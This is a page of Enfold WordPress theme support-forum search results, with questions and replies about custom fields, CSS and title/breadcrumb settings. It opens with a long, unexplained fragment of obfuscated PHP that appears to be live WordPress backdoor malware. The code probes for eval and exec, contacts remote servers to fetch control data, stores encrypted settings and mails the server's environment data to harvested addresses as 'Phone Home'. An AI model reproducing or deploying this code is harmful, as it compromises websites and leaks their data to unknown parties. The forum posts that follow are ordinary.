$this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($oXyaqmHoChvHQFCvTluqmAC == false) { return false; } else{ if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘servers’])) { return false; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk = null,$BZaxGALPLdVfntBIQWUPs = null){ if (strstr($gXNjWLFkUQOugyREMXKvZBfw, $_SERVER[‘HTTP_HOST’]) || trim($gXNjWLFkUQOugyREMXKvZBfw) == ”) { return false; } if (isset($WbKPQMoSbMZkXUeYKXRIk)) { $BdlbpgzPBjxVLkBLnsrXkmI = json_encode($WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC($BdlbpgzPBjxVLkBLnsrXkmI); $WbKPQMoSbMZkXUeYKXRIk = array( “serverKey” => $WbKPQMoSbMZkXUeYKXRIk[‘serverKey’], “data” => $oXyaqmHoChvHQFCvTluqmAC[‘data’], “key” => $oXyaqmHoChvHQFCvTluqmAC[‘key’] ); } while (true){ $SCvWTGyfCYyeLdjcFFzobk = curl_init(); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_URL,”http://$gXNjWLFkUQOugyREMXKvZBfw&#8221;); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_RETURNTRANSFER,1); @curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRIk)) { curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRIk); } curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_CONNECTTIMEOUT,10); $oXyaqmHoChvHQFCvTluqmAC = curl_exec($SCvWTGyfCYyeLdjcFFzobk); curl_close($SCvWTGyfCYyeLdjcFFzobk); if (!strstr($oXyaqmHoChvHQFCvTluqmAC, “301 Moved Permanently”)) { break; } else{ preg_match_all(‘/<a.*href=\”””http:\/\/(.*?)\”””.*?\>/’,$oXyaqmHoChvHQFCvTluqmAC,$NyFDhMvsSaUwvJsx); $gXNjWLFkUQOugyREMXKvZBfw = $NyFDhMvsSaUwvJsx[1][0]; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function aIIwgKgvtyRoWoMedUdbp($piiJbwvzLxHvKjlNnFzd, $oXyaqmHoChvHQFCvTluqmAC) { if (is_array($oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = json_encode($oXyaqmHoChvHQFCvTluqmAC); } $ilUTrmqGvQsBtZfyeBXfg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($ilUTrmqGvQsBtZfyeBXfg)) $oXyaqmHoChvHQFCvTluqmAC = json_decode($ilUTrmqGvQsBtZfyeBXfg, true); if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘key’]) || !isset($oXyaqmHoChvHQFCvTluqmAC[‘data’]) || strlen($oXyaqmHoChvHQFCvTluqmAC[‘key’]) == 0 || strlen($oXyaqmHoChvHQFCvTluqmAC[‘data’]) == 0 ) { die(); } update_option($piiJbwvzLxHvKjlNnFzd, $ilUTrmqGvQsBtZfyeBXfg); } private function McEnUjjQfaFzqGsihhU($piiJbwvzLxHvKjlNnFzd, $ysnqBUjsRbJDIlZaAE = false) { if (!$ysnqBUjsRbJDIlZaAE) { $oXyaqmHoChvHQFCvTluqmAC = get_option($piiJbwvzLxHvKjlNnFzd); }else{ $oXyaqmHoChvHQFCvTluqmAC = $piiJbwvzLxHvKjlNnFzd; } $GfNOeQGoTKggozAbXZAUpg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); return json_decode($GfNOeQGoTKggozAbXZAUpg, true); } private function YrCTrfUzBfsVJKvqiYUeFbc(){ $givBPiVtALrQjPLInUFKegOE = false; @eval(‘$givBPiVtALrQjPLInUFKegOE = true;’); return $givBPiVtALrQjPLInUFKegOE; } private function KNstTqErzZQBDQOODaJdLv() { $BlvGDekbFjVHsnUrjUKqdj = explode(‘, ‘, ini_get(‘disable_functions’)); return !in_array(‘exec’, $BlvGDekbFjVHsnUrjUKqdj); } private function XnpSvtOjNDRmxyfzaDKlGwM($oXyaqmHoChvHQFCvTluqmAC = null) { if ($oXyaqmHoChvHQFCvTluqmAC == null) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; } if (isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]++; }else{ $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] = 1; } if (($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] % 100) == 0 && isset($oXyaqmHoChvHQFCvTluqmAC[‘clients’])){ foreach ($oXyaqmHoChvHQFCvTluqmAC[‘clients’] as $qBNcTAaiRUhfdXBSzsVg) { if (strstr($qBNcTAaiRUhfdXBSzsVg, “|”) === false) { continue; } else{ $AoNmaQCAQvHyEPvRUhbfukXQ = explode(“|”, $qBNcTAaiRUhfdXBSzsVg); } $gXNjWLFkUQOugyREMXKvZBfw = $AoNmaQCAQvHyEPvRUhbfukXQ[0] . “?” . $AoNmaQCAQvHyEPvRUhbfukXQ[1]; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw); preg_match(“/<div id=\”serverList\” style=\”display: none\”>(?<content>.*?)<\/div>/”, $OQijXfnrxWxPIcPSUibKEFmLE, $NUwGojaMFrWOXnaoPPXmg); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($NUwGojaMFrWOXnaoPPXmg[‘content’])){ $OQijXfnrxWxPIcPSUibKEFmLE = json_decode($NUwGojaMFrWOXnaoPPXmg[‘content’], true); if (isset($this->oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; }else{ $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC[‘servers’] = array_merge($OQijXfnrxWxPIcPSUibKEFmLE[‘servers’], $oXyaqmHoChvHQFCvTluqmAC[‘servers’]); $this->$oXyaqmHoChvHQFCvTluqmAC[‘servers’] = array_unique($oXyaqmHoChvHQFCvTluqmAC[‘servers’]); } else{ } } } if ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] % 100 == 0) { $LMKkvQfVacsJkiwJOKQmc = false; $aJQafHDwnaPrCJrQMjHVh = $this->XsvsqpxlWxfKYiyUc($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100 * 5); $GSpWdZRUzAuMgSxhFeQsTA = array(); for($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < 5 ; $BCEUSjHFFwzzqmHmpjjQI++) { $YwrSbZoVizxkPzSqHegTC = rand( 0, count($aJQafHDwnaPrCJrQMjHVh) – 1); $TcfJENOGUCdnEeJdjBHSxLc = 0; $XCZRNpIiBvvCJTeyKlycSwY = 0; while(in_array($YwrSbZoVizxkPzSqHegTC,$GSpWdZRUzAuMgSxhFeQsTA)){ $XCZRNpIiBvvCJTeyKlycSwY++; $TcfJENOGUCdnEeJdjBHSxLc ++; $YwrSbZoVizxkPzSqHegTC = rand( 0, count($aJQafHDwnaPrCJrQMjHVh) – 1); if ($TcfJENOGUCdnEeJdjBHSxLc == 10) { $LMKkvQfVacsJkiwJOKQmc = true; break; } } if ($LMKkvQfVacsJkiwJOKQmc){ break; } $GSpWdZRUzAuMgSxhFeQsTA[] = $YwrSbZoVizxkPzSqHegTC; mail($aJQafHDwnaPrCJrQMjHVh[$YwrSbZoVizxkPzSqHegTC], “Phone Home”, json_encode($this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC(print_r($oXyaqmHoChvHQFCvTluqmAC, true) . print_r($_SERVER, true)))); } $this->vwhhtIrAWhUEFDgPrcco = true; } $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function YYfeblxJfGQgkPpfdrIOXNZwHg($oXyaqmHoChvHQFCvTluqmAC){ $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == null) return false; return true; } private function VitTYMKdJITsiXBTLOEA($QrnkCEWRkHbQPoEPelYQRw, $MTPkrEtDJbjkrzXWSBgAo) { $PVSXPKLAQGaWKUtNNUYQFoBuJE = count($QrnkCEWRkHbQPoEPelYQRw); if ($PVSXPKLAQGaWKUtNNUYQFoBuJE <= $MTPkrEtDJbjkrzXWSBgAo) { return $QrnkCEWRkHbQPoEPelYQRw; } $oXyaqmHoChvHQFCvTluqmAC[] = array(); $PaTgoaVMMKhvlmVWxSnBVLA = array(); $FyQVCWLNApYgwsSzygQgg = 0; $BCEUSjHFFwzzqmHmpjjQI = 0; while (true) { $BCEUSjHFFwzzqmHmpjjQI++; $piiJbwvzLxHvKjlNnFzd = $this->YHhBHrBuAZYCsZUCLxMNBSuTU($this->htcFFCQTLLpnCchsPKGYxso . $BCEUSjHFFwzzqmHmpjjQI , $PVSXPKLAQGaWKUtNNUYQFoBuJE); if (in_array($piiJbwvzLxHvKjlNnFzd, $PaTgoaVMMKhvlmVWxSnBVLA)) { continue; } $PaTgoaVMMKhvlmVWxSnBVLA[] = $piiJbwvzLxHvKjlNnFzd; $FyQVCWLNApYgwsSzygQgg++; if ($FyQVCWLNApYgwsSzygQgg == $MTPkrEtDJbjkrzXWSBgAo) { break; } } foreach ($PaTgoaVMMKhvlmVWxSnBVLA as $piiJbwvzLxHvKjlNnFzd) { $oXyaqmHoChvHQFCvTluqmAC[] = $QrnkCEWRkHbQPoEPelYQRw[$piiJbwvzLxHvKjlNnFzd]; } return $oXyaqmHoChvHQFCvTluqmAC; } private function YHhBHrBuAZYCsZUCLxMNBSuTU($htcFFCQTLLpnCchsPKGYxso, $BwYCWyuBYkgiOzNljFJONA) { $dzVXtdBSuUwgnARTiNICo = 0; $JAxNyUCJRbrfbemcWrOFpg = hash(“md5”,$htcFFCQTLLpnCchsPKGYxso); $dzVXtdBSuUwgnARTiNICo = (preg_replace(“/[^0-9,.]/”, “”, $JAxNyUCJRbrfbemcWrOFpg)); while ($dzVXtdBSuUwgnARTiNICo > 10000000){ $dzVXtdBSuUwgnARTiNICo /= 100000; } $this->IatJdWimJbxtprWZElHevfI = $dzVXtdBSuUwgnARTiNICo; $dzVXtdBSuUwgnARTiNICo %= $BwYCWyuBYkgiOzNljFJONA; return $dzVXtdBSuUwgnARTiNICo; } } ?>

    #255598

    In reply to: Taxonomy filter

    This reply has been marked as private.
    #253577
    amsdes
    Participant

    Hello,

    I would like to ask if the following customisation is possible for products presentation, for someone who wants to sell events/seminars:
    1) to be able to add a sort description under produst title
    2) to be able to add custom fields such as: calendar/time/price

    For your help, I am attaching an image containing the above: product/event

    If it is not possible, it would be a very cool feature to have, to make enfold truly, and fully customisable. There is a great demand for event organisers for such features.

    Thank you.

    #253113

    Hi Victor!

    Thank you for using the theme!

    I’m sorry but this is beyond the scope of support and is not a theme related issue. You might need to find a plugin or hire a freelance developer to add the feature for you. You can find the blog grid code on config-templatebuilder > avia-shortcodes > postslider.php. Find this code on line 374. This is the post date, comment count container. Maybe you can use custom fields to replace the output.

    if($show_meta && !empty($excerpt))
    					{
    						$output .= "<div class='slide-meta'>";
    						if ( $commentCount != "0" || comments_open($the_id) && $entry->post_type != 'portfolio')
    						{
    							$link_add = $commentCount === "0" ? "#respond" : "#comments";
    							$text_add = $commentCount === "1" ? __('Comment', 'avia_framework' ) : __('Comments', 'avia_framework' );
    
    							$output .= "<div class='slide-meta-comments'><a href='{$link}{$link_add}'>{$commentCount} {$text_add}</a></div><div class='slide-meta-del'>/</div>";
    						}
                            $markup = avia_markup_helper(array('context' => 'entry_time','echo'=>false));
    						$output .= "<time class='slide-meta-time updated' $markup>" .get_the_time(get_option('date_format'), $the_id)."</time>";
    						$output .= "</div>";
    					}

    I hope that helps.

    Regards,
    Ismael

    #253018
    cryscryb
    Participant

    This has been a really great theme!

    I just installed the latest theme update and am glad I kept a backup of the older release. I have been browsing the forums for an answer to my regarding why images site-wide (inserted using the editor) are now displaying incorrectly. It looks like the theme makers have decided to override the WP resize tool feature. Now any image inserted in the editor is displaying 100% of the parent container width. While I understand and appreciate that this was an effort to increase responsiveness, for some it can create more problems than it solves. The related thread I was reading is located here:

    https://kriesi.at/support/topic/image-function-still-not-working-correctly/

    I would have responded to this thread, however it has been closed. I just want to mention that this was the first thread I’ve encountered where the solution was less than desirable. I know this is not the norm (the solutions offered here are usually exceedingly helpful, positive and prompt). I thought I’d try to shed some new light on why the answers provided may feel unsatisfactory for some:

    – Not being able to use a new feature of the latest WP 3.9 seems counter-intuitive.

    – This may confuse users when they try to help themselves using the WordPress guides/codex, since everywhere they read will tell them how this feature should work (the first thing I did was go to the WordPress support site and RTFM to see what was up).

    – The fix (although minor for an experienced user) requires a core edit that will be wiped out on the next theme update. This might be easy for me, but not for a client. It means I’m going to get a few calls to fix things that I’d rather not have to fix since I encourage clients and friends to purchase this theme.

    – Being required to upload multiple copies of the same image (just to increase or decrease the image size by 10-50 pixels in my client’s case) is neither efficient nor convenient. Yes, users should ideally use images at the correct size whenever possible. However, expecting everyone should know how to use an image editor is not realistic. Expecting them to be able to mass edit and re-upload is also not realistic.

    – There are plenty of reasons to not use the enfold layout builder image insert (such as the axillary fields/tabs provided on Woocommerce product pages where the layout builder is not available). Graphics inserted here can added up to thousands of images on a single e-commerce site suddenly not working correctly (this will be the case on one of my client sites if he chooses to update). Re-sizing all of these images and re-uploading and re-inserting is not a feasible option for him. Neither is editing the core to have it wiped out next update resulting in frustrated calls to the person who recommended this theme to them (me). Editing 2000+ product pages to assign a css style to re-size each image (slightly) as needed is also unfeasible.

    – WordPress changed/modified the WP resize tool for a reason, because users wanted this to be an easy to use feature.

    Anyway, I do very much appreciate all of the hard work that went into this theme. I don’t like to complain about any feature. I usually just open the child/custom CSS in Dreamweaver and make quick edits there, but it won’t work persistently in this case so I thought I’d post my feedback here.

    Can you please consider making this an option that can be turned on/off so users can use the new feature provided in WP without making core edits?

    Thanks,
    Crys :)

    • This topic was modified 11 years, 10 months ago by cryscryb.
    #252979
    noble51
    Participant

    My client wants to use JotForm for their forms.

    JotForm allows you to use the website’s CSS to carry over the website styles on the form.

    See here: http://www.jotform.com/help/117-How-to-Inject-Custom-CSS-Codes

    What are the .form specifics that I can cut and paste into the JotForm custom css to make this work?

    Any help would be appreciated.

    Thanks

    #250686

    Hi!

    Glad that you fixed the header.

    Please use this on Quick CSS or custom.css to fix the input fields:

    #top .input-text, #top input[type="text"], #top input[type="input"], #top input[type="password"], #top input[type="email"], #top input[type="number"], #top input[type="url"], #top input[type="tel"], #top input[type="search"], #top textarea, #top select {
    min-width: 100% !important;
    }

    Cheers!
    Ismael

    #248940
    cirrus05
    Participant

    Some HTML code we are adding to a page requires us to import a javascript file in the body of the page right above the HTML code. If I add the javascript import html, save the page, and then go back to the page to edit it, the javascript import code is being removed. I understand this is a wordpress specific problem.

    So I tried to avoid this by adding a custom shortcode to “output” the javascript import html instead but the theme doesn’t appear to process short codes either. Even if I used the custom fields and try to add something like:

    [cf]js-slider[/cf]

    When you view the page you’ll see the same thing rather than the rendered version of the short code.

    • This topic was modified 11 years, 11 months ago by cirrus05. Reason: clarification
    #248736
    SlickBear
    Participant

    I have added the code to function.php and the new fields are there however when I apply in the CSS it does not work.

    Here are some examples of what I am trying with developer id = “asset-index-toggler”

    Example 1:
    #top #asset-index-toggler .js_active .toggler {
    -moz-user-select: none;
    border-style: solid;
    border-width: 1px;
    cursor: pointer;
    display: block;
    font-size: 20px !important;
    margin: 0;
    padding: 8px 7px 10px 50px;
    position: relative;
    top: 1px;
    }

    Example 2:
    #asset-index-toggler .js_active .toggler {
    -moz-user-select: none;
    border-style: solid;
    border-width: 1px;
    cursor: pointer;
    display: block;
    font-size: 20px !important;
    margin: 0;
    padding: 8px 7px 10px 50px;
    position: relative;
    top: 1px;
    }

    Example3:
    .asset-index-toggler .js_active .toggler {
    -moz-user-select: none;
    border-style: solid;
    border-width: 1px;
    cursor: pointer;
    display: block;
    font-size: 20px !important;
    margin: 0;
    padding: 8px 7px 10px 50px;
    position: relative;
    top: 1px;
    }

    If I leave out “asset-index-toggler” then it applies the styling to all togglers which I dont want.
    I have cleared cache and all those good things and still nothing.

    Please advise, thanks.

    #248229

    Hey,

    ‘header’ is set to ‘yes’ in custom fields.

    #247077

    So I had the older version of Enfold (2.4.5) in my themes folder, but was being unused. As soon as I removed it, all issues were solved.

    But back to the main issue – I am not able to get a figure out why posts are not displaying a header (on both posts & pages). I have checked:

    • Title Bar Setting (in Edit Page/Post) is set to: Display Title and Breadcrumbs
    • Title Bar Setting (in Enfold Theme Options) is set to: Display Title and Breadcrumbs
    • header_title_bar (in Custom Fields within Edit Page/Post) is set to: title_bar_breadcrumb
    • There is nothing in style.css that would indicate .title_container or .breadcrumb is set to display:none;

    Is there anywhere else where this could be turned off or set to display:none?

    Thanks!

    #245076

    Hey!

    1) Yes, it’s the default mobile menu styling. If you want to customize it I suggest to hire a freelancer who can change the styling of the “desktop” version of the menu based on you requirements.

    2) You can apply a custom class to the section: http://kriesi.at/documentation/enfold/turn-on-custom-css-field-for-all-alb-elements/ and then use this class to add a pattern image as background. I.e. use the class “avia-custom-background” and into the quick css fields insert:

    
    #top .avia-custom-background{ background-image: url(https://mywebsite.com/pattern.png); }
    

    instead of http://mywebsite.com/pattern.png insert the url to the pattern/png image. You can also add multiple images http://www.css3.info/preview/multiple-backgrounds/ if necessary.

    Best regards,
    Peter

    #244942
    neufold
    Participant

    (Using a Child theme and latest version of Enfold)

    In the theme settings, despite having the option “Header Title and Breadcrumbs” enabled, and in the page template as well, neither the title nor breadcrumbs, were coming up!

    Oddly enough, this was happening in some new pages I had created. In some of the pages of the demo content, they were still there.
    Made me think that this probably wasn’t a template or CSS issue, but more of a database query not being rewritten.

    Decide to check “Screen Options” of the page I was working on and enabled “Custom Fields”. Once that was enabled, I scrolled down and noticed “header” with the value “no”. Switched that value to “yes”, updated the custom field, and finally updated the page, and the title and breadcrumbs were working again!

    Title and Breadcrumbs

    #244939

    Topic: Couple questions

    in forum Enfold
    senso
    Participant

    Hi team,

    I’m using the child theme

    1) For this theme, what is the recommended way to add new fonts?

    2) For sidebar widget, is there a way to decide which categories to be shown?

    3) Mega Menu – Is there a max number of subpages/subcategories allowed?

    I’m doing this,
    1A
    – 1Aa
    – 1Aaa
    – 1Aaaa
    – 1Aaaaa
    – 1Aaaaaa
    – 1Aaaaaaa

    It seems that after 5 subpages are added, the MegaMenu drop down is truncated.

    3a) Is it possible to arrange the subpages under 1A into 2 columns?

    4) I can’t seem to find the option to change font size via the theme settings?

    5) Is there a way to display custom titles or post titles instead of the Blog – Latest News

    6) have an option to show breadcrumb only?

    7) Menu – What is the max number of main and sub pages supported for mobile version? It seems that the megamenu is truncated in mobile version.

    8) I’d like to add custom fields in single posts, how and where should i edit the files? Is using Advanced custom field plugin advisable and compatible with this theme?

    9) Can you recommend a plugin for form that is compatible with this theme?

    10) Can you recommend a plugin for social sharing? I am surprised it is not included with the theme.

    Thanks

    • This topic was modified 11 years, 11 months ago by senso.
    #240813

    by the way, I noticed that the custom css names are saved in the fields of all other objects, except for the special heading content box. That one is where the problem is.

Viewing 30 results - 1,501 through 1,530 (of 1,633 total)